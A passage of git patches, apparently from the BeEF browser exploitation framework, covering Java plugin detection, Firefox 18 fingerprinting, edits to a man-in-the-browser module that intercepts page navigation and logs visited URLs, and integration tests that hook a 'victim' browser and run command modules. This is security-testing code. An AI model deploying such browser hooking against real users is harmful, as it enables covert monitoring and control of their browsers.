true}if(q=="undefined"||q==null){q="1.4.2"}var o=false;var r="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var n=q.match(r);if(n!=null){o=this.versionCheck(q+"+")}else{g("[isWebStartInstaller()] Invalid minimumVersion argument to isWebStartInstalled(): "+q);o=this.versionCheck("1.4.2+")}return o},getJPIVersionUsingMimeType:function(){for(var o=0;o<navigator.mimeTypes.length;++o){var p=navigator.mimeTypes[o].type;var n=p.match(/^application\/x-java-applet;jpi-version=(.*)$/);if(n!=null){this.firefoxJavaVersion=n[1];if("Opera"!=this.browserName2){break}}}},launchWebStartApplication:function(q){var n=navigator.userAgent.toLowerCase();this.getJPIVersionUsingMimeType();if(this.isWebStartInstalled("1.7.0")==false){if((this.installJRE("1.7.0+")==false)||((this.isWebStartInstalled("1.7.0")==false))){return false}}var t=null;if(document.documentURI){t=document.documentURI}if(t==null){t=document.URL}var o=this.getBrowser();var p;if(o=="MSIE"){p='<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0"><PARAM name="launchjnlp" value="'+q+'"><PARAM name="docbase" value="'+t+'"></object>'}else{if(o=="Netscape Family"){p='<embed type="application/x-java-applet;jpi-version='+this.firefoxJavaVersion+'" width="0" height="0" launchjnlp="'+q+'"docbase="'+t+'" />'}}if(document.body=="undefined"||document.body==null){document.write(p);document.location=t}else{var r=document.createElement("div");r.id="div1";r.style.position="relative";r.style.left="-10000px";r.style.margin="0px auto";r.className="dynamicDiv";r.innerHTML=p;document.body.appendChild(r)}},createWebStartLaunchButtonEx:function(p,o){if(this.returnPage==null){this.returnPage=p}var n="javascript:deployJava.launchWebStartApplication('"+p+"');";document.write('<a href="'+n+'" onMouseOver="window.status=\'\'; return true;"><img src="'+this.launchButtonPNG+'" border="0" /></a>')},createWebStartLaunchButton:function(p,o){if(this.returnPage==null){this.returnPage=p}var n="javascript:if (!deployJava.isWebStartInstalled(&quot;"+o+"&quot;)) {if (deployJava.installLatestJRE()) {if (deployJava.launch(&quot;"+p+"&quot;)) {}}} else {if (deployJava.launch(&quot;"+p+"&quot;)) {}}";document.write('<a href="'+n+'" onMouseOver="window.status=\'\'; return true;"><img src="'+this.launchButtonPNG+'" border="0" /></a>')},launch:function(n){document.location=n;return true},isPluginInstalled:function(){var n=this.getPlugin();if(n&&n.jvms){return true}else{return false}},isAutoUpdateEnabled:function(){if(this.isPluginInstalled()){return this.getPlugin().isAutoUpdateEnabled()}return false},setAutoUpdateEnabled:function(){if(this.isPluginInstalled()){return this.getPlugin().setAutoUpdateEnabled()}return false},setInstallerType:function(n){this.installType=n;if(this.isPluginInstalled()){return this.getPlugin().setInstallerType(n)}return false},setAdditionalPackages:function(n){if(this.isPluginInstalled()){return this.getPlugin().setAdditionalPackages(n)}return false},setEarlyAccess:function(n){this.EAInstallEnabled=n},isPlugin2:function(){if(this.isPluginInstalled()){if(this.versionCheck("1.6.0_10+")){try{return this.getPlugin().isPlugin2()}catch(n){}}}return false},allowPlugin:function(){this.getBrowser();var n=("Safari"!=this.browserName2&&"Opera"!=this.browserName2);return n},getPlugin:function(){this.refresh();var n=null;if(this.allowPlugin()){n=document.getElementById("deployJavaPlugin")}return n},compareVersionToPattern:function(u,o,q,r){if(u==undefined||o==undefined){return false}var v="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var w=u.match(v);if(w!=null){var t=0;var x=new Array();for(var p=1;p<w.length;++p){if((typeof w[p]=="string")&&(w[p]!="")){x[t]=w[p];t++}}var n=Math.min(x.length,o.length);if(r){for(var p=0;p<n;++p){if(x[p]<o[p]){return false}else{if(x[p]>o[p]){return true}}}return true}else{for(var p=0;p<n;++p){if(x[p]!=o[p]){return false}}if(q){return true}else{return(x.length==o.length)}}}else{return false}},getBrowser:function(){if(this.browserName==null){var n=navigator.userAgent.toLowerCase();g("[getBrowser()] navigator.userAgent.toLowerCase() -> "+n);if((n.indexOf("msie")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="MSIE";this.browserName2="MSIE"}else{if(n.indexOf("iphone")!=-1){this.browserName="Netscape Family";this.browserName2="iPhone"}else{if((n.indexOf("firefox")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="Netscape Family";this.browserName2="Firefox"}else{if(n.indexOf("chrome")!=-1){this.browserName="Netscape Family";this.browserName2="Chrome"}else{if(n.indexOf("safari")!=-1){this.browserName="Netscape Family";this.browserName2="Safari"}else{if((n.indexOf("mozilla")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="Netscape Family";this.browserName2="Other"}else{if(n.indexOf("opera")!=-1){this.browserName="Netscape Family";this.browserName2="Opera"}else{this.browserName="?";this.browserName2="unknown"}}}}}}}g("[getBrowser()] Detected browser name:"+this.browserName+", "+this.browserName2)}return this.browserName},testUsingActiveX:function(n){var p="JavaWebStart.isInstalled."+n+".0";if(typeof ActiveXObject=="undefined"||!ActiveXObject){g("[testUsingActiveX()] Browser claims to be IE, but no ActiveXObject object?");return false}try{return(new ActiveXObject(p)!=null)}catch(o){return false}},testForMSVM:function(){var o="{08B0E5C0-4FCB-11CF-AAA5-00401C608500}";if(typeof oClientCaps!="undefined"){var n=oClientCaps.getComponentVersion(o,"ComponentID");if((n=="")||(n=="5,0,5000,0")){return false}else{return true}}else{return false}},testUsingMimeTypes:function(o){if(!navigator.mimeTypes){g("[testUsingMimeTypes()] Browser claims to be Netscape family, but no mimeTypes[] array?");return false}for(var p=0;p<navigator.mimeTypes.length;++p){s=navigator.mimeTypes[p].type;var n=s.match(/^application\/x-java-applet\x3Bversion=(1\.8|1\.7|1\.6|1\.5|1\.4\.2)$/);if(n!=null){if(this.compareVersions(n[1],o)){return true}}}return false},testUsingPluginsArray:function(o){if((!navigator.plugins)||(!navigator.plugins.length)){return false}var n=navigator.platform.toLowerCase();for(var p=0;p<navigator.plugins.length;++p){s=navigator.plugins[p].description;if(s.search(/^Java Switchable Plug-in (Cocoa)/)!=-1){if(this.compareVersions("1.5.0",o)){return true}}else{if(s.search(/^Java/)!=-1){if(n.indexOf("win")!=-1){if(this.compareVersions("1.5.0",o)||this.compareVersions("1.6.0",o)){return true}}}}}if(this.compareVersions("1.5.0",o)){return true}return false},IEInstall:function(){location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"");return false},done:function(o,n){},FFInstall:function(){location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"")+((this.installType!=null)?("&type="+this.installType):"");return false},compareVersions:function(q,r){var o=q.split(".");var n=r.split(".");for(var p=0;p<o.length;++p){o[p]=Number(o[p])}for(var p=0;p<n.length;++p){n[p]=Number(n[p])}if(o.length==2){o[2]=0}if(o[0]>n[0]){return true}if(o[0]<n[0]){return false}if(o[1]>n[1]){return true}if(o[1]<n[1]){return false}if(o[2]>n[2]){return true}if(o[2]<n[2]){return false}return true},enableAlerts:function(){this.browserName=null;this.debug=true},poll:function(){this.refresh();var n=this.getJREs();if((this.preInstallJREList.length==0)&&(n.length!=0)){clearInterval(this.myInterval);if(this.returnPage!=null){location.href=this.returnPage}}if((this.preInstallJREList.length!=0)&&(n.length!=0)&&(this.preInstallJREList[0]!=n[0])){clearInterval(this.myInterval);if(this.returnPage!=null){location.href=this.returnPage}}},writePluginTag:function(){var n=this.getBrowser();if(n=="MSIE"){document.write('<object classid="clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA" id="deployJavaPlugin" width="0" height="0"></object>')}else{if(n=="Netscape Family"&&this.allowPlugin()){this.writeEmbedTag()}}},refresh:function(){navigator.plugins.refresh(false);var n=this.getBrowser();if(n=="Netscape Family"&&this.allowPlugin()){var o=document.getElementById("deployJavaPlugin");if(o==null){this.writeEmbedTag()}}},writeEmbedTag:function(){var n=false;if(navigator.mimeTypes!=null){for(var o=0;o<navigator.mimeTypes.length;o++){if(navigator.mimeTypes[o].type==this.mimeType){if(navigator.mimeTypes[o].enabledPlugin){document.write('<embed id="deployJavaPlugin" type="'+this.mimeType+'" hidden="true" />');n=true}}}if(!n){for(var o=0;o<navigator.mimeTypes.length;o++){if(navigator.mimeTypes[o].type==this.oldMimeType){if(navigator.mimeTypes[o].enabledPlugin){document.write('<embed id="deployJavaPlugin" type="'+this.oldMimeType+'" hidden="true" />')}}}}}}};d.writePluginTag();if(d.locale==null){var h=null;if(h==null){try{h=navigator.userLanguage}catch(f){}}if(h==null){try{h=navigator.systemLanguage}catch(f){}}if(h==null){try{h=navigator.language}catch(f){}}if(h!=null){h.replace("-","_");d.locale=h}}return d}();
+
+            var versionJRE = deployJava.getJREs();
+
+            if(versionJRE != '')
+            {
+                return true;
+            }else {
+                return false;
+            }
+        }
+        else return true;
 
-        if(versionJRE != '')
-            return true;
-        else
-            return false;
 	},
 
 	/**

From 60589dc60758701b7b3e45e0474618ca6b97baed Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 9 Jan 2013 15:01:07 +0000
Subject: [PATCH 148/397] Minor changes to MiTB core.

---
 core/main/client/mitb.js | 8 ++------
 1 file changed, 2 insertions(+), 6 deletions(-)

diff --git a/core/main/client/mitb.js b/core/main/client/mitb.js
index 9ed626b74..58b7585f7 100644
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -14,7 +14,6 @@ beef.mitb = {
         beef.mitb.cid = cid;
         beef.mitb.curl = curl;
         /*Override open method to intercept ajax request*/
-        var xml_type;
         var hook_file = "<%= @hook_file %>";
 
         if (window.XMLHttpRequest && !(window.ActiveXObject)) {
@@ -161,11 +160,10 @@ beef.mitb = {
             y.open('GET', url, false, true);
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
-
                     target.innerHTML = y.responseText;
                     setTimeout(beef.mitb.hook, 10);
                 }
-            }
+            };
             y.send(null);
             beef.mitb.sniff("GET: " + url);
             return true;
@@ -200,11 +198,9 @@ beef.mitb = {
             beef.mitb.sniff("GET: " + url);
 
         } catch (x) {
-
-
+            // the link is cross-domain, so load the resource in a different tab
             window.open(url);
             beef.mitb.sniff("GET [New Window]: " + url);
-
         }
     },
 

From c2dbc50d00cc025a042eb2bb046243846dcf9e34 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 10 Jan 2013 08:44:50 +1030
Subject: [PATCH 149/397] Added support for Firefox 18

---
 core/main/client/browser.js | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 6e74ed44a..0f1029b26 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -213,12 +213,20 @@ beef.browser = {
 		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/17\./) != null;
 	},
 
+	/**
+	 * Returns true if FF18
+	 * @example: beef.browser.isFF18()
+	 */
+	isFF18: function() {
+		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/18\./) != null;
+	},
+
 	/**
 	 * Returns true if FF.
 	 * @example: beef.browser.isFF()
 	 */
 	isFF: function() {
-		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17();
+		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18();
 	},
 
 	/**
@@ -509,6 +517,7 @@ beef.browser = {
 			FF15:	this.isFF15(),	// Firefox 15
 			FF16:	this.isFF16(),	// Firefox 16
 			FF17:	this.isFF17(),	// Firefox 17
+			FF18:	this.isFF18(),	// Firefox 18
 			FF:	this.isFF(),	// Firefox any version
 
 			IE6:	this.isIE6(),	// Internet Explorer 6
@@ -578,6 +587,7 @@ beef.browser = {
 		if (this.isFF15())	{ return '15' };	// Firefox 15
 		if (this.isFF16())	{ return '16' };	// Firefox 16
 		if (this.isFF17())  { return '17' };    // Firefox 17
+		if (this.isFF18())  { return '18' };    // Firefox 18
 
 		if (this.isIE6())	{ return '6'  };	// Internet Explorer 6
 		if (this.isIE7())	{ return '7'  };	// Internet Explorer 7

From 224cf0c7d0f0c547d77ff6eb4f691563af80ec67 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sat, 12 Jan 2013 14:26:16 +1030
Subject: [PATCH 150/397] Added `window.devicePixelRatio` to Firefox 18
 detection

---
 core/main/client/browser.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 0f1029b26..80df2192b 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -218,7 +218,7 @@ beef.browser = {
 	 * @example: beef.browser.isFF18()
 	 */
 	isFF18: function() {
-		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/18\./) != null;
+		return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/18\./) != null;
 	},
 
 	/**

From fcbd2516e66952fe231d816030862775b69bff3d Mon Sep 17 00:00:00 2001
From: qswain2 <qswain2@washcoll.edu>
Date: Mon, 14 Jan 2013 23:12:55 -0500
Subject: [PATCH 151/397] Add test cases for jools

Added test cases for jools based on examples
---
 test/unit/tc_jools.rb | 114 ++++++++++++++++++++++++++++++++++++++++++
 test/unit/ts_unit.rb  |   2 +
 2 files changed, 116 insertions(+)
 create mode 100644 test/unit/tc_jools.rb

diff --git a/test/unit/tc_jools.rb b/test/unit/tc_jools.rb
new file mode 100644
index 000000000..8924172aa
--- /dev/null
+++ b/test/unit/tc_jools.rb
@@ -0,0 +1,114 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+require 'test/unit'
+require '../common/test_constants'
+require '../common/beef_test'
+
+class TC_Jools < Test::Unit::TestCase
+    @@victim = BeefTest.new_victim
+
+    #test jools can be acces and a new object can be instantiated
+    def test_jools_exists
+        @@victim = BeefTest.new_victim
+        script = "return require('jools');"
+        jools = @@victim.execute_script(script)
+        assert_not_nil jools
+        script = "var Jools = require('jools');
+        return new Jools([]);"
+        jools_obj = @@victim.execute_script(script)
+        assert_not_nil jools_obj
+    end
+
+    #test simple jools rule example
+    def test_jools_simple
+        @@victim = BeefTest.new_victim
+        script = " var Jools = require('jools');
+            var rules = [{
+            'name':'Lights on after 8pm',
+            'condition': function(hour){
+                return hour >= 8;
+            },
+            'consequence': function(){
+                this.state = 'on';
+            }
+            }];
+            var fact = {
+                'hour':8,
+                'minute':21
+            };
+            var j = new Jools(rules);
+            var result = j.execute(fact);
+            return result.state;"
+       result = @@victim.execute_script(script)
+       assert_equal result,'on'
+    end
+
+    #test jools chaining example
+    def test_jools_chaning
+        @@victim = BeefTest.new_victim
+        script = " var Jools = require('jools');
+            var rules = [
+            {'name':'frog is green',
+            'condition': function(animal){
+                return animal == 'frog';
+            },
+            'consequence': function(){
+                this.color = 'green';
+            }},
+            {'name':'canary is yellow',
+            'condition': function(animal){
+                return animal == 'canary';
+            },
+            'consequence': function(){
+                this.color = 'yellow';
+            }},
+            {'name':'croaks and eats flies',
+            'condition' : function(eats){
+                return eats && eats.indexOf('croaks') >= 0 && eats.indexOf('flies') >=0;
+            },
+            'consequence': function(){
+                this.animal = 'frog';
+            }},
+            {'name':'chirps and sings',
+            'condition' : function(does){
+                return does && does.indexOf('chirps') >= 0 && does.indexOf('sings') >=0;
+            },
+            'consequence': function(){
+                this.animal = 'canary';
+            }}
+            ];
+            var fact_1 = {
+                'name':'fritz',
+                'eats': ['croaks','flies']
+            };
+            var fact_2 = {
+                'name':'fritz',
+                'eats': ['croaks','rocks']
+            };
+            var fact_3 = {
+                'name':'tweety',
+                'does': ['sings','chirps']
+            };
+            var fact_4 = {
+                'name':'tweety',
+                'does': ['chrips','howls']
+            };
+
+            var j = new Jools(rules);
+            var results = [];
+             results.push(j.execute(fact_1));
+             results.push(j.execute(fact_2));
+             results.push(j.execute(fact_3));
+             results.push(j.execute(fact_4));
+            return results;"
+       results = @@victim.execute_script(script)
+       assert_not_nil results
+       assert_equal results[0]['color'],'green'
+       assert_not_equal results[1]['color'], 'green'
+       assert_equal results[2]['color'],'yellow'
+       assert_not_equal results[3]['color'], 'yellow'
+    end
+end
diff --git a/test/unit/ts_unit.rb b/test/unit/ts_unit.rb
index 109e99ba6..0c86a0aec 100644
--- a/test/unit/ts_unit.rb
+++ b/test/unit/ts_unit.rb
@@ -28,6 +28,7 @@ require './extensions/tc_requester'
 require './extensions/tc_event_logger'
 require './tc_grep'
 require './tc_filesystem'
+require './tc_jools'
 
 class TS_BeefTests
   def self.suite
@@ -53,6 +54,7 @@ class TS_BeefTests
     suite << TC_Hackverter.suite
     suite << TC_EventLogger.suite
 	suite << TC_Hooks.suite
+    suite << TC_Jools.suite
 
     return suite
   end

From cc4900418916cb77cfb8a00d19073be20804c498 Mon Sep 17 00:00:00 2001
From: Saafan <a.m.saafan@gmail.com>
Date: Tue, 15 Jan 2013 17:03:54 +0200
Subject: [PATCH 152/397] Fix IE java detection.

---
 core/main/client/browser.js | 37 ++++++++++++++++++++++++++++++++++++-
 1 file changed, 36 insertions(+), 1 deletion(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 6e74ed44a..3a6cf1ab8 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -666,7 +666,42 @@ beef.browser = {
                 return false;
             }
         }
-        else return true;
+        else
+        {
+            function testUsingActiveX(n) {
+                var p = "JavaWebStart.isInstalled." + n + ".0";
+                if (typeof ActiveXObject == "undefined" || !ActiveXObject) {
+                    g("[testUsingActiveX()] Browser claims to be IE, but no ActiveXObject object?");
+                    return false
+                }
+                try {
+                    return (new ActiveXObject(p) != null)
+                } catch (o) {
+                    return false
+                }
+            }
+
+            if (testUsingActiveX("1.7.0")) {
+                return true;
+            } else {
+                if (testUsingActiveX("1.6.0")) {
+                    return true;
+                } else {
+                    if (testUsingActiveX("1.5.0")) {
+                        return true;
+                    } else {
+                        if (testUsingActiveX("1.4.2")) {
+                            return true;
+                        }
+                        else {
+                            return false;
+                        }
+                    }
+                }
+            }
+
+
+        }
 
 	},
 

From f584403a9284dbae58d298ed6adc46803de47864 Mon Sep 17 00:00:00 2001
From: qswain2 <qswain2@washcoll.edu>
Date: Tue, 15 Jan 2013 18:25:19 -0500
Subject: [PATCH 153/397] Move jools tests to integration

Moved tc_jools to integrations test directory
since the requires seem to be what were breaking
the other tests in the unit test suit
---
 test/{unit => integration}/tc_jools.rb | 18 +++++++++---------
 test/integration/ts_integration.rb     |  2 ++
 test/unit/ts_unit.rb                   |  2 --
 3 files changed, 11 insertions(+), 11 deletions(-)
 rename test/{unit => integration}/tc_jools.rb (90%)

diff --git a/test/unit/tc_jools.rb b/test/integration/tc_jools.rb
similarity index 90%
rename from test/unit/tc_jools.rb
rename to test/integration/tc_jools.rb
index 8924172aa..b174f0db4 100644
--- a/test/unit/tc_jools.rb
+++ b/test/integration/tc_jools.rb
@@ -4,27 +4,27 @@
 # See the file 'doc/COPYING' for copying permission
 #
 require 'test/unit'
-require '../common/test_constants'
 require '../common/beef_test'
+require '../common/test_constants'
 
 class TC_Jools < Test::Unit::TestCase
-    @@victim = BeefTest.new_victim
 
     #test jools can be acces and a new object can be instantiated
     def test_jools_exists
-        @@victim = BeefTest.new_victim
+        victim = BeefTest.new_victim
         script = "return require('jools');"
-        jools = @@victim.execute_script(script)
+        jools = victim.execute_script(script)
         assert_not_nil jools
         script = "var Jools = require('jools');
         return new Jools([]);"
-        jools_obj = @@victim.execute_script(script)
+        jools_obj = victim.execute_script(script)
         assert_not_nil jools_obj
+        victim.reset_session!
     end
 
     #test simple jools rule example
     def test_jools_simple
-        @@victim = BeefTest.new_victim
+        victim = BeefTest.new_victim
         script = " var Jools = require('jools');
             var rules = [{
             'name':'Lights on after 8pm',
@@ -42,13 +42,13 @@ class TC_Jools < Test::Unit::TestCase
             var j = new Jools(rules);
             var result = j.execute(fact);
             return result.state;"
-       result = @@victim.execute_script(script)
+       result = victim.execute_script(script)
        assert_equal result,'on'
     end
 
     #test jools chaining example
     def test_jools_chaning
-        @@victim = BeefTest.new_victim
+        victim = BeefTest.new_victim
         script = " var Jools = require('jools');
             var rules = [
             {'name':'frog is green',
@@ -104,7 +104,7 @@ class TC_Jools < Test::Unit::TestCase
              results.push(j.execute(fact_3));
              results.push(j.execute(fact_4));
             return results;"
-       results = @@victim.execute_script(script)
+       results = victim.execute_script(script)
        assert_not_nil results
        assert_equal results[0]['color'],'green'
        assert_not_equal results[1]['color'], 'green'
diff --git a/test/integration/ts_integration.rb b/test/integration/ts_integration.rb
index 57d3a5ed2..f82c130a0 100644
--- a/test/integration/ts_integration.rb
+++ b/test/integration/ts_integration.rb
@@ -15,6 +15,7 @@ require 'selenium/webdriver'
 require './check_environment' # Basic log in and log out tests
 require './tc_debug_modules' # RESTful API tests (as well as debug modules)
 require './tc_login' # Basic log in and log out tests
+require './tc_jools' # Basic tests for jools
 
 class TS_BeefIntegrationTests
   def self.suite
@@ -23,6 +24,7 @@ class TS_BeefIntegrationTests
     suite << TC_CheckEnvironment.suite
     #suite << TC_DebugModules.suite
     suite << TC_login.suite
+    suite << TC_Jools.suite
 
     return suite
   end
diff --git a/test/unit/ts_unit.rb b/test/unit/ts_unit.rb
index 0c86a0aec..109e99ba6 100644
--- a/test/unit/ts_unit.rb
+++ b/test/unit/ts_unit.rb
@@ -28,7 +28,6 @@ require './extensions/tc_requester'
 require './extensions/tc_event_logger'
 require './tc_grep'
 require './tc_filesystem'
-require './tc_jools'
 
 class TS_BeefTests
   def self.suite
@@ -54,7 +53,6 @@ class TS_BeefTests
     suite << TC_Hackverter.suite
     suite << TC_EventLogger.suite
 	suite << TC_Hooks.suite
-    suite << TC_Jools.suite
 
     return suite
   end

From 63b7d44a5e1f5d03b1cd25c58f4ae53de56886d1 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Thu, 17 Jan 2013 14:17:04 +0000
Subject: [PATCH 154/397] Enabled debug_modules tests. Now they work properly
 and are effective to automatically check if command modules generally work.

---
 test/integration/tc_debug_modules.rb | 75 +++++++++++++++++++---------
 test/integration/tc_login.rb         |  2 +-
 test/integration/ts_integration.rb   |  2 +-
 3 files changed, 53 insertions(+), 26 deletions(-)

diff --git a/test/integration/tc_debug_modules.rb b/test/integration/tc_debug_modules.rb
index c5c3db680..56ab4ba3f 100644
--- a/test/integration/tc_debug_modules.rb
+++ b/test/integration/tc_debug_modules.rb
@@ -18,8 +18,13 @@ class TC_DebugModules < Test::Unit::TestCase
   @@mod_debug_ascii_chars = nil
   @@mod_debug_test_network = nil
 
+  # NOTE: Tests within the same test class are called in the order they are defined.
+  # NOTE: However, test classes are run in alphabetical order by classname.
+  # That's why we use the prefix x_N_y, with N being the order of execution.
+  #
+
   # Test RESTful API authentication with default credentials, returns the API token to be used later.
-  def test_restful_auth
+  def test_1_restful_auth
     response = RestClient.post "#{RESTAPI_ADMIN}/login",
                                { 'username' => "#{BEEF_USER}",
                                  'password' => "#{BEEF_PASSWD}"}.to_json,
@@ -34,9 +39,9 @@ class TC_DebugModules < Test::Unit::TestCase
   end
 
   # Test RESTful API hooks handler hooking a victim browser, and then retrieving his BeEF session
-  def test_restful_hooks
+  def test_2_restful_hooks
     BeefTest.new_victim
-    sleep 2.0
+    sleep 5.0
     response = RestClient.get "#{RESTAPI_HOOKS}", {:params => {:token => @@token}}
     assert_equal 200, response.code
     assert_not_nil response.body
@@ -46,7 +51,7 @@ class TC_DebugModules < Test::Unit::TestCase
   end
 
   # Test RESTful API modules handler, retrieving the IDs of the 3 debug modules currently in the framework
-  def test_restful_modules
+  def test_3_restful_modules
     response = RestClient.get "#{RESTAPI_MODULES}", {:params => {:token => @@token}}
     assert_equal 200, response.code
     assert_not_nil response.body
@@ -65,8 +70,8 @@ class TC_DebugModules < Test::Unit::TestCase
     assert_not_nil @@mod_debug_ascii_chars
     assert_not_nil @@mod_debug_test_network
   end
-
-  # Test debug module "Test_return_long_string" using the RESTful API
+  #
+  ## Test debug module "Test_return_long_string" using the RESTful API
   def test_return_long_string
     repeat_string = "BeEF"
     repeat_count = 20
@@ -83,17 +88,25 @@ class TC_DebugModules < Test::Unit::TestCase
     assert success
 
     cmd_id = result['command_id']
-    sleep 3.0
-    response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_long_string}/#{cmd_id}", {:params => {:token => @@token}}
+    count = 0
+    response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_long_string}/#{cmd_id}?token=#{@@token}"
+
+    #TODO if the response is empty, the body size is 2, basically an empty Hash.
+    # don't know why empty?, nil and other checks are not working.
+    while(response.body.size <= 2 && count < 10)
+      response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_long_string}/#{cmd_id}?token=#{@@token}"
+      sleep 2
+      count += 1
+    end
     assert_equal 200, response.code
     assert_not_nil response.body
     result = JSON.parse(response.body)
-    data = JSON.parse(result["data"])
+    data = JSON.parse(result['0']['data'])['data']
     assert_not_nil data
-    assert_equal data["data"],(repeat_string * repeat_count)
+    assert_equal data,(repeat_string * repeat_count)
   end
-
-  # Test debug module "Test_return_ascii_chars" using the RESTful API
+  #
+  ## Test debug module "Test_return_ascii_chars" using the RESTful API
   def test_return_ascii_chars
     response = RestClient.post "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_ascii_chars}?token=#{@@token}",
                                {}.to_json, # module does not expect any input
@@ -104,18 +117,25 @@ class TC_DebugModules < Test::Unit::TestCase
     result = JSON.parse(response.body)
     success = result['success']
     assert success
-
     cmd_id = result['command_id']
-    sleep 3.0
-    response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_ascii_chars}/#{cmd_id}", {:params => {:token => @@token}}
+    count = 0
+    response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_ascii_chars}/#{cmd_id}?token=#{@@token}"
+
+    #TODO if the response is empty, the body size is 2, basically an empty Hash.
+    # don't know why empty?, nil and other checks are not working.
+    while(response.body.size <= 2 && count < 10)
+       response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_ascii_chars}/#{cmd_id}?token=#{@@token}"
+       sleep 2
+       count += 1
+    end
     assert_equal 200, response.code
     assert_not_nil response.body
     result = JSON.parse(response.body)
-    data = JSON.parse(result["data"])
+    data = JSON.parse(result['0']['data'])['data']
     assert_not_nil data
     ascii_chars = ""
     (32..127).each do |i| ascii_chars << i.chr end
-    assert_equal ascii_chars,data["data"]
+    assert_equal ascii_chars,data
   end
 
   # Test debug module "Test_network_request" using the RESTful API
@@ -134,16 +154,23 @@ class TC_DebugModules < Test::Unit::TestCase
     assert success
 
     cmd_id = result['command_id']
-    sleep 3.0
-    response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_test_network}/#{cmd_id}", {:params => {:token => @@token}}
+    count = 0
+    response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_test_network}/#{cmd_id}?token=#{@@token}"
+
+    #TODO if the response is empty, the body size is 2, basically an empty Hash.
+    # don't know why empty?, nil and other checks are not working.
+    while(response.body.size <= 2 && count < 10)
+      response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_test_network}/#{cmd_id}?token=#{@@token}"
+      sleep 2
+      count += 1
+    end
     assert_equal 200, response.code
     assert_not_nil response.body
     result = JSON.parse(response.body)
-    data = JSON.parse(result["data"])
-    res = JSON.parse(data["data"])
-    assert_not_nil res
-    assert_equal 200, res["status_code"]
-    assert res["response_body"].include?("However you should still be capable of accessing it\n\t\tusing the Requester")
+    data = JSON.parse(result['0']['data'])['data']
+    assert_not_nil data
+    assert_equal 200, JSON.parse(data)["status_code"]
+    assert JSON.parse(data)["response_body"].include?("However you should still be capable of accessing it\n\t\tusing the Requester")
 
   end
 end
\ No newline at end of file
diff --git a/test/integration/tc_login.rb b/test/integration/tc_login.rb
index 698c2782e..008f0a3a9 100644
--- a/test/integration/tc_login.rb
+++ b/test/integration/tc_login.rb
@@ -63,7 +63,7 @@ class TC_login < Test::Unit::TestCase
     attacker = BeefTest.new_attacker
     victim = BeefTest.new_victim
 
-    sleep 2.0
+    sleep 5.0
 
     attacker.has_content?(VICTIM_DOMAIN)
     attacker.has_content?('127.0.0.1')
diff --git a/test/integration/ts_integration.rb b/test/integration/ts_integration.rb
index f82c130a0..c148a9c9d 100644
--- a/test/integration/ts_integration.rb
+++ b/test/integration/ts_integration.rb
@@ -22,8 +22,8 @@ class TS_BeefIntegrationTests
 
     suite = Test::Unit::TestSuite.new(name="BeEF Integration Test Suite")
     suite << TC_CheckEnvironment.suite
-    #suite << TC_DebugModules.suite
     suite << TC_login.suite
+    suite << TC_DebugModules.suite
     suite << TC_Jools.suite
 
     return suite

From 3c4a0fad347e95aff03379e6f56ef890176cd4f6 Mon Sep 17 00:00:00 2001
